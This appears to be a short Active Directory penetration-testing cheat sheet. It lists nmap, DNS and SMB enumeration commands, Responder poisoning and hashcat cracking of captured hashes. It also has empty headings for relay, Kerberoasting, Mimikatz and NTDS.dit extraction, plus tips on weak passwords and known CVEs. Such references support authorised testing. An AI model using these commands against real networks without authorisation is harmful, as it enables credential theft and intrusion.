🎯Quick Reference

Initial Recon & Enumeration

# Network discovery
nmap -sn 10.10.10.0/24
nmap -sC -sV -O -p- --min-rate=1000 10.10.10.10

# DNS enumeration
dnsrecon -d domain.local -r 10.10.10.0/24
dnsenum domain.local

# SMB enumeration
smbclient -L //10.10.10.10
enum4linux -a 10.10.10.10
crackmapexec smb 10.10.10.0/24

LLMNR/NBT-NS Poisoning

# Start Responder
sudo responder -I eth0 -rdwv

# Crack captured hashes
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

SMB Relay Attack

Kerberoasting

Pass the Hash/Ticket

Token Impersonation

Mimikatz Quick Commands

NTDS.dit Extraction

Persistence

IPv6 Attacks

Quick Win Commands

File Transfer

Remember!

  • Always check SMB signing before relay attacks

  • Try password = username for service accounts

  • Check for PrintNightmare, ZeroLogon if newer systems

  • Document everything - screenshots are your friend!

Last updated